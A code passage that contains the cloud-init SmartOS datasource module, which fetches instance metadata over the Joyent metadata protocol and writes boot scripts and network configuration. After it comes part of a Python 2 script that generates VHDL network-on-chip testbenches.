# per the SmartOS location. It is not preferable, but is done for
# legacy reasons
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS datasource",
self.md_client)
return False
for ci_noun, attribute in SMARTOS_ATTRIB_MAP.items():
smartos_noun, strip = attribute
md[ci_noun] = self.md_client.get(smartos_noun, strip=strip)
for ci_noun, smartos_noun in SMARTOS_ATTRIB_JSON.items():
md[ci_noun] = self.md_client.get_json(smartos_noun)
# @datadictionary: This key may contain a program that is written
# to a file in the filesystem of the guest on each boot and then
# executed. It may be of any format that would be considered
# executable in the guest instance.
#
# We write 'user-script' and 'operator-script' into the
# instance/data directory. The default vendor-data then handles
# executing them later.
data_d = os.path.join(self.paths.get_cpath(), 'instances',
md['instance-id'], 'data')
user_script = os.path.join(data_d, 'user-script')
u_script_l = "%s/user-script" % LEGACY_USER_D
write_boot_content(md.get('user-script'), content_f=user_script,
link=u_script_l, shebang=True, mode=0o700)
operator_script = os.path.join(data_d, 'operator-script')
write_boot_content(md.get('operator-script'),
content_f=operator_script, shebang=False,
mode=0o700)
# @datadictionary: This key has no defined format, but its value
# is written to the file /var/db/mdata-user-data on each boot prior
# to the phase that runs user-script. This file is not to be executed.
# This allows a configuration file of some kind to be injected into
# the machine to be consumed by the user-script when it runs.
u_data = md.get('legacy-user-data')
u_data_f = "%s/mdata-user-data" % LEGACY_USER_D
write_boot_content(u_data, u_data_f)
# Handle the cloud-init regular meta
if not md['local-hostname']:
md['local-hostname'] = md['instance-id']
ud = None
if md['user-data']:
ud = md['user-data']
if not md['vendor-data']:
md['vendor-data'] = BUILTIN_VENDOR_DATA % {
'user_script': user_script,
'operator_script': operator_script,
'per_boot_d': os.path.join(self.paths.get_cpath("scripts"),
'per-boot'),
}
self.metadata = util.mergemanydict([md, self.metadata])
self.userdata_raw = ud
self.vendordata_raw = md['vendor-data']
self.network_data = md['network-data']
self._set_provisioned()
return True
def device_name_to_device(self, name):
return self.ds_cfg['disk_aliases'].get(name)
def get_config_obj(self):
if self.smartos_type == SMARTOS_ENV_KVM:
return BUILTIN_CLOUD_CONFIG
return {}
def get_instance_id(self):
return self.metadata['instance-id']
@property
def network_config(self):
if self._network_config is None:
if self.network_data is not None:
self._network_config = (
convert_smartos_network_data(
network_data=self.network_data,
dns_servers=self.metadata['dns_servers'],
dns_domain=self.metadata['dns_domain']))
return self._network_config
class JoyentMetadataFetchException(Exception):
pass
class JoyentMetadataClient(object):
"""
A client implementing v2 of the Joyent Metadata Protocol Specification.
The full specification can be found at
http://eng.joyent.com/mdata/protocol.html
"""
line_regex = re.compile(
r'V2 (?P<length>\d+) (?P<checksum>[0-9a-f]+)'
r' (?P<body>(?P<request_id>[0-9a-f]+) (?P<status>SUCCESS|NOTFOUND)'
r'( (?P<payload>.+))?)')
def __init__(self, smartos_type=None, fp=None):
if smartos_type is None:
smartos_type = get_smartos_environ()
self.smartos_type = smartos_type
self.fp = fp
def _checksum(self, body):
return '{0:08x}'.format(
binascii.crc32(body.encode('utf-8')) & 0xffffffff)
def _get_value_from_frame(self, expected_request_id, frame):
frame_data = self.line_regex.match(frame).groupdict()
if int(frame_data['length']) != len(frame_data['body']):
raise JoyentMetadataFetchException(
'Incorrect frame length given ({0} != {1}).'.format(
frame_data['length'], len(frame_data['body'])))
expected_checksum = self._checksum(frame_data['body'])
if frame_data['checksum'] != expected_checksum:
raise JoyentMetadataFetchException(
'Invalid checksum (expected: {0}; got {1}).'.format(
expected_checksum, frame_data['checksum']))
if frame_data['request_id'] != expected_request_id:
raise JoyentMetadataFetchException(
'Request ID mismatch (expected: {0}; got {1}).'.format(
expected_request_id, frame_data['request_id']))
if not frame_data.get('payload', None):
LOG.debug('No value found.')
return None
value = util.b64d(frame_data['payload'])
LOG.debug('Value "%s" found.', value)
return value
def request(self, rtype, param=None):
request_id = '{0:08x}'.format(random.randint(0, 0xffffffff))
message_body = ' '.join((request_id, rtype,))
if param:
message_body += ' ' + base64.b64encode(param.encode()).decode()
msg = 'V2 {0} {1} {2}\n'.format(
len(message_body), self._checksum(message_body), message_body)
LOG.debug('Writing "%s" to metadata transport.', msg)
need_close = False
if not self.fp:
self.open_transport()
need_close = True
self.fp.write(msg.encode('ascii'))
self.fp.flush()
response = bytearray()
response.extend(self.fp.read(1))
while response[-1:] != b'\n':
response.extend(self.fp.read(1))
if need_close:
self.close_transport()
response = response.rstrip().decode('ascii')
LOG.debug('Read "%s" from metadata transport.', response)
if 'SUCCESS' not in response:
return None
value = self._get_value_from_frame(request_id, response)
return value
def get(self, key, default=None, strip=False):
result = self.request(rtype='GET', param=key)
if result is None:
return default
if result and strip:
result = result.strip()
return result
def get_json(self, key, default=None):
result = self.get(key, default=default)
if result is None:
return default
return json.loads(result)
def list(self):
result = self.request(rtype='KEYS')
if result:
result = result.split('\n')
return result
def put(self, key, val):
param = b' '.join([base64.b64encode(i.encode())
for i in (key, val)]).decode()
return self.request(rtype='PUT', param=param)
def delete(self, key):
return self.request(rtype='DELETE', param=key)
def close_transport(self):
if self.fp:
self.fp.close()
self.fp = None
def __enter__(self):
if self.fp:
return self
self.open_transport()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close_transport()
return
def open_transport(self):
raise NotImplementedError
class JoyentMetadataSocketClient(JoyentMetadataClient):
def __init__(self, socketpath, smartos_type=SMARTOS_ENV_LX_BRAND):
super(JoyentMetadataSocketClient, self).__init__(smartos_type)
self.socketpath = socketpath
def open_transport(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socketpath)
self.fp = sock.makefile('rwb')
def exists(self):
return os.path.exists(self.socketpath)
def __repr__(self):
return "%s(socketpath=%s)" % (self.__class__.__name__, self.socketpath)
class JoyentMetadataSerialClient(JoyentMetadataClient):
def __init__(self, device, timeout=10, smartos_type=SMARTOS_ENV_KVM):
super(JoyentMetadataSerialClient, self).__init__(smartos_type)
self.device = device
self.timeout = timeout
def exists(self):
return os.path.exists(self.device)
def open_transport(self):
ser = serial.Serial(self.device, timeout=self.timeout)
if not ser.isOpen():
raise SystemError("Unable to open %s" % self.device)
self.fp = ser
def __repr__(self):
return "%s(device=%s, timeout=%s)" % (
self.__class__.__name__, self.device, self.timeout)
class JoyentMetadataLegacySerialClient(JoyentMetadataSerialClient):
"""V1 of the protocol was not safe for all values.
Thus, we allowed the user to pass values in as base64 encoded.
Users may still reasonably expect to be able to send base64 data
and have it transparently decoded. So even though the V2 format is
now used, and is safe (using base64 itself), we keep legacy support.
The way for a user to do this was:
a.) specify 'base64_keys' key whose value is a comma delimited
list of keys that were base64 encoded.
b.) base64_all: string interpreted as a boolean that indicates
if all keys are base64 encoded.
c.) set a key named b64-<keyname> with a boolean indicating that
<keyname> is base64 encoded."""
def __init__(self, device, timeout=10, smartos_type=None):
s = super(JoyentMetadataLegacySerialClient, self)
s.__init__(device, timeout, smartos_type)
self.base64_keys = None
self.base64_all = None
def _init_base64_keys(self, reset=False):
if reset:
self.base64_keys = None
self.base64_all = None
keys = None
if self.base64_all is None:
keys = self.list()
if 'base64_all' in keys:
self.base64_all = util.is_true(self._get("base64_all"))
else:
self.base64_all = False
if self.base64_all:
# short circuit if base64_all is true
return
if self.base64_keys is None:
if keys is None:
keys = self.list()
b64_keys = set()
if 'base64_keys' in keys:
b64_keys = set(self._get("base64_keys").split(","))
# now add any b64-<keyname> that has a true value
for key in [k[3:] for k in keys if k.startswith("b64-")]:
if util.is_true(self._get(key)):
b64_keys.add(key)
else:
if key in b64_keys:
b64_keys.remove(key)
self.base64_keys = b64_keys
def _get(self, key, default=None, strip=False):
return (super(JoyentMetadataLegacySerialClient, self).
get(key, default=default, strip=strip))
def is_b64_encoded(self, key, reset=False):
if key in NO_BASE64_DECODE:
return False
self._init_base64_keys(reset=reset)
if self.base64_all:
return True
return key in self.base64_keys
def get(self, key, default=None, strip=False):
mdefault = object()
val = self._get(key, strip=False, default=mdefault)
if val is mdefault:
return default
if self.is_b64_encoded(key):
try:
val = base64.b64decode(val.encode()).decode()
# Bogus input produces different errors in Python 2 and 3
except (TypeError, binascii.Error):
LOG.warn("Failed base64 decoding key '%s': %s", key, val)
if strip:
val = val.strip()
return val
def jmc_client_factory(
smartos_type=None, metadata_sockfile=METADATA_SOCKFILE,
serial_device=SERIAL_DEVICE, serial_timeout=SERIAL_TIMEOUT,
uname_version=None):
if smartos_type is None:
smartos_type = get_smartos_environ(uname_version)
if smartos_type is None:
return None
elif smartos_type == SMARTOS_ENV_KVM:
return JoyentMetadataLegacySerialClient(
device=serial_device, timeout=serial_timeout,
smartos_type=smartos_type)
elif smartos_type == SMARTOS_ENV_LX_BRAND:
return JoyentMetadataSocketClient(socketpath=metadata_sockfile,
smartos_type=smartos_type)
raise ValueError("Unknown value for smartos_type: %s" % smartos_type)
def write_boot_content(content, content_f, link=None, shebang=False,
mode=0o400):
"""
Write the content to content_f. Under the following rules:
1. If no content, remove the file
2. Write the content
3. If executable and no file magic, add it
4. If there is a link, create it
@param content: what to write
@param content_f: the file name
@param backup_d: the directory to save the backup at
@param link: if defined, location to create a symlink to
@param shebang: if no file magic, set shebang
@param mode: file mode
Becuase of the way that Cloud-init executes scripts (no shell),
a script will fail to execute if does not have a magic bit (shebang) set
for the file. If shebang=True, then the script will be checked for a magic
bit and to the SmartOS default of assuming that bash.
"""
if not content and os.path.exists(content_f):
os.unlink(content_f)
if link and os.path.islink(link):
os.unlink(link)
if not content:
return
util.write_file(content_f, content, mode=mode)
if shebang and not content.startswith("#!"):
try:
cmd = ["file", "--brief", "--mime-type", content_f]
(f_type, _err) = util.subp(cmd)
LOG.debug("script %s mime type is %s", content_f, f_type)
if f_type.strip() == "text/plain":
new_content = "\n".join(["#!/bin/bash", content])
util.write_file(content_f, new_content, mode=mode)
LOG.debug("added shebang to file %s", content_f)
except Exception as e:
util.logexc(LOG, ("Failed to identify script type for %s" %
content_f, e))
if link:
try:
if os.path.islink(link):
os.unlink(link)
if content and os.path.exists(content_f):
util.ensure_dir(os.path.dirname(link))
os.symlink(content_f, link)
except IOError as e:
util.logexc(LOG, "failed establishing content link: %s", e)
def get_smartos_environ(uname_version=None, product_name=None):
uname = os.uname()
# SDC LX-Brand Zones lack dmidecode (no /dev/mem) but
# report 'BrandZ virtual linux' as the kernel version
if uname_version is None:
uname_version = uname[3]
if uname_version.lower() == 'brandz virtual linux':
return SMARTOS_ENV_LX_BRAND
if product_name is None:
system_type = util.read_dmi_data("system-product-name")
else:
system_type = product_name
if system_type and 'smartdc' in system_type.lower():
return SMARTOS_ENV_KVM
return None
# Convert SMARTOS 'sdc:nics' data to network_config yaml
def convert_smartos_network_data(network_data=None,
dns_servers=None, dns_domain=None):
"""Return a dictionary of network_config by parsing provided
SMARTOS sdc:nics configuration data
sdc:nics data is a dictionary of properties of a nic and the ip
configuration desired. Additional nic dictionaries are appended
to the list.
Converting the format is straightforward though it does include
duplicate information as well as data which appears to be relevant
to the hostOS rather than the guest.
For each entry in the nics list returned from query sdc:nics, we
create a type: physical entry, and extract the interface properties:
'mac' -> 'mac_address', 'mtu', 'interface' -> 'name'. The remaining
keys are related to ip configuration. For each ip in the 'ips' list
we create a subnet entry under 'subnets' pairing the ip to a one in
the 'gateways' list.
"""
valid_keys = {
'physical': [
'mac_address',
'mtu',
'name',
'params',
'subnets',
'type',
],
'subnet': [
'address',
'broadcast',
'dns_nameservers',
'dns_search',
'metric',
'pointopoint',
'routes',
'scope',
'type',
],
}
if dns_servers:
if not isinstance(dns_servers, (list, tuple)):
dns_servers = [dns_servers]
else:
dns_servers = []
if dns_domain:
if not isinstance(dns_domain, (list, tuple)):
dns_domain = [dns_domain]
else:
dns_domain = []
def is_valid_ipv4(addr):
return '.' in addr
def is_valid_ipv6(addr):
return ':' in addr
pgws = {
'ipv4': {'match': is_valid_ipv4, 'gw': None},
'ipv6': {'match': is_valid_ipv6, 'gw': None},
}
config = []
for nic in network_data:
cfg = dict((k, v) for k, v in nic.items()
if k in valid_keys['physical'])
cfg.update({
'type': 'physical',
'name': nic['interface']})
if 'mac' in nic:
cfg.update({'mac_address': nic['mac']})
subnets = []
for ip in nic.get('ips', []):
if ip == "dhcp":
subnet = {'type': 'dhcp4'}
else:
subnet = dict((k, v) for k, v in nic.items()
if k in valid_keys['subnet'])
subnet.update({
'type': 'static',
'address': ip,
})
proto = 'ipv4' if is_valid_ipv4(ip) else 'ipv6'
# Only use gateways for 'primary' nics
if 'primary' in nic and nic.get('primary', False):
# the ips and gateways list may be N to M, here
# we map the ip index into the gateways list,
# and handle the case that we could have more ips
# than gateways. we only consume the first gateway
if not pgws[proto]['gw']:
gateways = [gw for gw in nic.get('gateways', [])
if pgws[proto]['match'](gw)]
if len(gateways):
pgws[proto]['gw'] = gateways[0]
subnet.update({'gateway': pgws[proto]['gw']})
subnets.append(subnet)
cfg.update({'subnets': subnets})
config.append(cfg)
if dns_servers:
config.append(
{'type': 'nameserver', 'address': dns_servers,
'search': dns_domain})
return {'version': 1, 'config': config}
# Used to match classes to dependencies
datasources = [
(DataSourceSmartOS, (sources.DEP_FILESYSTEM, )),
]
# Return a list of data sources that match this set of dependencies
def get_datasource_list(depends):
return sources.list_from_depends(depends, datasources)
if __name__ == "__main__":
import sys
jmc = jmc_client_factory()
if jmc is None:
print("Do not appear to be on smartos.")
sys.exit(1)
if len(sys.argv) == 1:
keys = (list(SMARTOS_ATTRIB_JSON.keys()) +
list(SMARTOS_ATTRIB_MAP.keys()) + ['network_config'])
else:
keys = sys.argv[1:]
def load_key(client, key, data):
if key in data:
return data[key]
if key in SMARTOS_ATTRIB_JSON:
keyname = SMARTOS_ATTRIB_JSON[key]
data[key] = client.get_json(keyname)
elif key == "network_config":
for depkey in ('network-data', 'dns_servers', 'dns_domain'):
load_key(client, depkey, data)
data[key] = convert_smartos_network_data(
network_data=data['network-data'],
dns_servers=data['dns_servers'],
dns_domain=data['dns_domain'])
else:
if key in SMARTOS_ATTRIB_MAP:
keyname, strip = SMARTOS_ATTRIB_MAP[key]
else:
keyname, strip = (key, False)
data[key] = client.get(keyname, strip=strip)
return data[key]
data = {}
for key in keys:
load_key(client=jmc, key=key, data=data)
print(json.dumps(data, indent=1, sort_keys=True,
separators=(',', ': ')))
|
prometheanfire/cloud-init
|
cloudinit/sources/DataSourceSmartOS.py
|
Python
|
gpl-3.0
| 29,325
|
# Copyright (C) 2016 Siavoosh Payandeh Azad
from math import ceil, log
import random
# -D [size]: sets the size of the network, it can be powers of two
# -Rand: generates random traffic patterns
import sys
if '--help' in sys.argv[1:]:
print "\t-D [network size]: makes a test bench for network of [size]X[size]. Size can be "
print "\t only multiples of two. default value is 4."
print "\t-DW [data_width]: sets the data width of the network!"
print "\t[-Rand/-BR] [PIR]: Uses [Rand]om traffic pattern generator with packet injection rate equal to PIR"
print "\t or Uses [B]it[R]eversal traffic pattern generator with packet injection rate equal to PIR"
print "\t default case is repetitive packets being sent from source to same destination"
print "\t-o: specifies the name and path of the output file. default path is current folder!"
print "\t-PS [min packet size] [max packet size]: specifies packet size. default min value is 3 and default max value is 8."
print "\t-PE: adds processing elements in each node"
print "\t-SHMU: maps shmu on one of the nodes"
print "\t-NI_Test: adds an NI to the nodes and connects a traffic generator to it"
print "\t-trace: adds trackers to network outputs"
print "\t-sim: specifies the length of simulation in clock cycles. which at this time the packet generators will stop sending packets."
print "\t-verbal: prints more details"
print "\t**Example 1: python network_tb_gen_parameterized_credit_based.py -D 2 -SHMU -NI_Test -Rand 0.01 -PS 3 3 -sim 10000 "
print "\t generates a testbench for a 2X2 network and adds NIs and NI_Testers to it which sends packets to random destinations "
print "\t with 0.01 injection rate, and packet size of 3 until 10000 ns"
print "\t**Example 2: python network_tb_gen_parameterized_credit_based.py -D 2 -Rand 0.005 -PS 3 3 -sim 10000 "
print "\t generates a testbench for a 2X2 network which uses random traffic pattern generator with PIR of 0.005 and fixed"
print "\t packet size of 3 and sends packets until 10000 ns"
sys.exit()
network_dime = 4
data_width = 32
random_dest = False
add_tracker = False
add_SHMU = False
add_node = False
add_NI_Test = False
got_finish_time = False
sim_finish_time = None
bit_reversal = False
get_packet_size = False
packet_size_min = 3
packet_size_max = 8
verbal = False
# file_path = file_name+'_'+str(network_dime)+"x"+str(network_dime)+'.vhd'
if '-D' in sys.argv[1:]:
network_dime = int(sys.argv[sys.argv.index('-D')+1])
if '-DW' in sys.argv[1:]:
data_width = int(sys.argv[sys.argv.index('-DW')+1])
if data_width % 2 != 0:
raise ValueError("wrong data width. please choose powers of 2. for example 32!")
if '-Rand' in sys.argv[1:]:
random_dest = True
PIR = float(sys.argv[sys.argv.index('-Rand')+1])
frame_size = int(ceil(1.0/PIR))
if '-SHMU' in sys.argv[1:]:
add_SHMU = True
if '-NI_Test' in sys.argv[1:]:
add_NI_Test = True
if "-PE" in sys.argv[1:]:
add_node = True
if "-trace" in sys.argv[1:]:
add_tracker = True
if '-BR' in sys.argv[1:]:
bit_reversal = True
PIR = float(sys.argv[sys.argv.index('-BR')+1])
frame_size = int(ceil(1.0/PIR))
if random_dest and bit_reversal:
raise ValueError("Can not accept multiple traffic patterns at the same time...")
if '-sim' in sys.argv[1:]:
got_finish_time = True
sim_finish_time = int(sys.argv[sys.argv.index('-sim')+1])
if '-PS' in sys.argv[1:]:
get_packet_size = True
packet_size_min = int(sys.argv[sys.argv.index('-PS')+1])
packet_size_max = int(sys.argv[sys.argv.index('-PS')+2])
if '-verbal' in sys.argv[1:]:
verbal = True
file_name = 'tb_network'
if random_dest:
file_name += '_rand'
elif bit_reversal:
file_name += '_br'
if '-o' in sys.argv[1:]:
file_path = sys.argv[sys.argv.index('-o')+1]
if ".vhd" not in file_path:
raise ValueError("wrong file extention. only vhdl files are accepted!")
else:
file_path = file_name+'_'+str(network_dime)+"x"+str(network_dime)+'.vhd'
noc_file = open(file_path, 'w')
if add_NI_Test and add_node:
raise ValueError("cant have -NI_Test and -PE at the same time")
noc_file.write("--Copyright (C) 2016 Siavoosh Payandeh Azad\n")
noc_file.write("------------------------------------------------------------\n")
noc_file.write("-- This file is automatically generated Please do not change!\n")
noc_file.write("-- Here are the parameters:\n")
noc_file.write("-- \t network size x:"+str(network_dime)+"\n")
noc_file.write("-- \t network size y:"+str(network_dime)+"\n")
noc_file.write("-- \t data width:"+str(data_width))
noc_file.write("-- \t traffic pattern:"+str())
noc_file.write("------------------------------------------------------------\n\n")
noc_file.write("library ieee;\n")
noc_file.write("use ieee.std_logic_1164.all;\n")
noc_file.write("use IEEE.STD_LOGIC_ARITH.ALL;\n")
noc_file.write("use IEEE.STD_LOGIC_UNSIGNED.ALL;\n")
noc_file.write("use work.TB_Package.all;\n\n")
noc_file.write("USE ieee.numeric_std.ALL; \n")
noc_file.write("use IEEE.math_real.\"ceil\";\n")
noc_file.write("use IEEE.math_real.\"log2\";\n\n")
noc_file.write("entity tb_network_"+str(network_dime)+"x"+str(network_dime)+" is\n")
noc_file.write("end tb_network_"+str(network_dime)+"x"+str(network_dime)+"; \n")
noc_file.write("\n\n")
noc_file.write("architecture behavior of tb_network_"+str(network_dime)+"x"+str(network_dime)+" is\n\n")
noc_file.write("-- Declaring network component\n")
string_to_print = ""
noc_file.write("component network_"+str(network_dime)+"x"+str(network_dime)+" is\n")
noc_file.write(" generic (DATA_WIDTH: integer := 32; DATA_WIDTH_LV: integer := 11);\n")
noc_file.write("port (reset: in std_logic; \n")
noc_file.write("\tclk: in std_logic; \n")
if not add_SHMU:
noc_file.write("\tRxy_reconf: in std_logic_vector(7 downto 0);\n")
noc_file.write("\tReconfig : in std_logic;\n")
for i in range(network_dime**2):
noc_file.write("\t--------------\n")
noc_file.write("\tRX_L_"+str(i)+": in std_logic_vector (DATA_WIDTH-1 downto 0);\n")
noc_file.write("\tcredit_out_L_"+str(i)+", valid_out_L_"+str(i)+": out std_logic;\n")
noc_file.write("\tcredit_in_L_"+str(i)+", valid_in_L_"+str(i)+": in std_logic;\n")
if i == network_dime**2-1 and add_SHMU== False:
noc_file.write("\tTX_L_"+str(i)+": out std_logic_vector (DATA_WIDTH-1 downto 0)\n")
else:
noc_file.write("\tTX_L_"+str(i)+": out std_logic_vector (DATA_WIDTH-1 downto 0);\n")
if add_SHMU:
for i in range(0, network_dime**2):
string_to_print +="\t--------------\n"
string_to_print +=" link_faults_"+str(i) +": out std_logic_vector(4 downto 0);\n"
string_to_print +=" turn_faults_"+str(i) +": out std_logic_vector(19 downto 0);\n"
string_to_print +=" Rxy_reconf_PE_"+str(i) +": in std_logic_vector(7 downto 0);\n"
string_to_print +=" Cx_reconf_PE_"+str(i) +": in std_logic_vector(3 downto 0);\n"
string_to_print +=" Reconfig_command_"+str(i) +" : in std_logic;\n\n"
noc_file.write(string_to_print[:len(string_to_print)-3])
noc_file.write("\n ); \n")
noc_file.write("end component; \n")
if add_tracker:
noc_file.write("component flit_tracker is\n")
noc_file.write(" generic (\n")
noc_file.write(" DATA_WIDTH: integer := 32;\n")
noc_file.write(" tracker_file: string :=\"track.txt\"\n")
noc_file.write(" );\n")
noc_file.write(" port (\n")
noc_file.write(" clk: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector (DATA_WIDTH-1 downto 0); \n")
noc_file.write(" valid_in : in std_logic \n")
noc_file.write(" );\n")
noc_file.write("end component;\n")
if add_node and not add_SHMU and not add_NI_Test:
noc_file.write("component NoC_Node is\n")
noc_file.write("generic( current_address : integer := 0; stim_file: string :=\"code.txt\";\n")
noc_file.write("\tlog_file : string := \"output.txt\");\n\n")
noc_file.write("port( reset : in std_logic;\n")
noc_file.write(" clk : in std_logic;\n")
noc_file.write(" \n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0)\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NoC_Node\n")
elif add_node and add_SHMU and not add_NI_Test:
noc_file.write("-- Declaring Node component\n\n")
noc_file.write("component NoC_Node is\n")
noc_file.write("generic( current_address : integer := 0;\n")
noc_file.write(" stim_file: string :=\"code.txt\";\n")
noc_file.write(" log_file : string := \"output.txt\");\n")
noc_file.write("\n")
noc_file.write("port( reset : in std_logic;\n")
noc_file.write(" clk : in std_logic;\n")
noc_file.write("\n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" link_faults: in std_logic_vector(4 downto 0);\n")
noc_file.write(" turn_faults: in std_logic_vector(19 downto 0);\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE: out std_logic_vector(7 downto 0);\n")
noc_file.write(" Cx_reconf_PE: out std_logic_vector(3 downto 0);\n")
noc_file.write(" Reconfig_command : out std_logic\n")
noc_file.write("\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NoC_Node\n")
elif not add_node and add_SHMU and add_NI_Test:
noc_file.write("-- Declaring NI component\n\n")
noc_file.write("component NI is\n")
noc_file.write(" generic(current_address : integer := 10; -- the current node's address\n")
noc_file.write(" SHMU_address : integer := 0); \n")
# noc_file.write(" reserved_address : std_logic_vector(29 downto 0) := \"000000000000000001111111111111\";\n")
# noc_file.write(" flag_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000000\"; -- reserved address for the memory mapped I/O\n")
# noc_file.write(" counter_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000001\";\n")
# noc_file.write(" reconfiguration_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000010\"; -- reserved address for reconfiguration register\n")
# noc_file.write(" self_diagnosis_address : std_logic_vector(29 downto 0) := \"000000000000000010000000000011\"); -- reserved address for self diagnosis register\n")
noc_file.write(" port(clk : in std_logic;\n")
noc_file.write(" reset : in std_logic;\n")
noc_file.write(" enable : in std_logic;\n")
noc_file.write(" write_byte_enable : in std_logic_vector(3 downto 0);\n")
noc_file.write(" address : in std_logic_vector(31 downto 2);\n")
noc_file.write(" data_write : in std_logic_vector(31 downto 0);\n")
noc_file.write(" data_read : out std_logic_vector(31 downto 0);\n")
noc_file.write("\n")
noc_file.write(" -- Flags used by JNIFR and JNIFW instructions\n")
noc_file.write(" --NI_read_flag : out std_logic; -- One if the N2P fifo is empty. No read should be performed if one.\n")
noc_file.write(" --NI_write_flag : out std_logic; -- One if P2N fifo is full. no write should be performed if one.\n")
noc_file.write(" -- interrupt signal: generated evertime a packet is recieved!\n")
noc_file.write(" irq_out : out std_logic;\n")
noc_file.write(" -- signals for sending packets to network\n")
noc_file.write(" credit_in : in std_logic;\n")
noc_file.write(" valid_out: out std_logic;\n")
noc_file.write(" TX: out std_logic_vector(31 downto 0); -- data sent to the NoC\n")
noc_file.write(" -- signals for reciving packets from the network\n")
noc_file.write(" credit_out : out std_logic;\n")
noc_file.write(" valid_in: in std_logic;\n")
noc_file.write(" RX: in std_logic_vector(31 downto 0); -- data recieved form the NoC\n")
noc_file.write(" -- fault information signals from the router\n")
noc_file.write(" link_faults: in std_logic_vector(4 downto 0);\n")
noc_file.write(" turn_faults: in std_logic_vector(19 downto 0);\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE: out std_logic_vector(7 downto 0);\n")
noc_file.write(" Cx_reconf_PE: out std_logic_vector(3 downto 0); -- if you are not going to update Cx you should write all ones! (it will be and will the current Cx bits)\n")
noc_file.write(" Reconfig_command : out std_logic\n")
noc_file.write(" );\n")
noc_file.write("end component; --component NI\n")
noc_file.write("\n")
noc_file.write("-- generating bulk signals...\n")
for i in range(0, network_dime*network_dime):
noc_file.write("\tsignal RX_L_"+str(i)+", TX_L_"+str(i)+": std_logic_vector ("+str(data_width-1)+" downto 0);\n")
noc_file.write("\tsignal credit_counter_out_"+str(i)+": std_logic_vector (1 downto 0);\n")
noc_file.write("\tsignal credit_out_L_"+str(i)+", credit_in_L_"+str(i)+", valid_in_L_"+str(i)+", valid_out_L_"+str(i) + ": std_logic;\n")
#noc_file.write("\n\nAlias buried_sig is <<signal .NoC.valid_in_E_11 :std_logic>>;\n\n")
if add_SHMU:
for i in range(0, network_dime*network_dime):
noc_file.write("\tsignal link_faults_"+str(i)+ " : std_logic_vector(4 downto 0);\n")
noc_file.write("\tsignal turn_faults_"+str(i)+ " : std_logic_vector(19 downto 0);\n")
noc_file.write("\tsignal Rxy_reconf_PE_"+str(i)+ " : std_logic_vector(7 downto 0);\n")
noc_file.write("\tsignal Cx_reconf_PE_"+str(i)+ " : std_logic_vector(3 downto 0);\n")
noc_file.write("\tsignal Reconfig_command_"+str(i)+ " : std_logic;\n")
noc_file.write("\t-- NI testing signals\n")
if add_NI_Test:
noc_file.write("\tsignal reserved_address : std_logic_vector(29 downto 0):= \"000000000000000001111111111111\";\n")
noc_file.write("\tsignal flag_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000000\" ; -- reserved address for the memory mapped I/O\n")
noc_file.write("\tsignal counter_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000001\";\n")
noc_file.write("\tsignal reconfiguration_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000010\"; -- reserved address for reconfiguration register\n")
noc_file.write("\tsignal self_diagnosis_address : std_logic_vector(29 downto 0):= \"000000000000000010000000000011\";\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "irq_out_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic;\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "test_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "enable_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic;\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "write_byte_enable_"+str(i)+ ", "
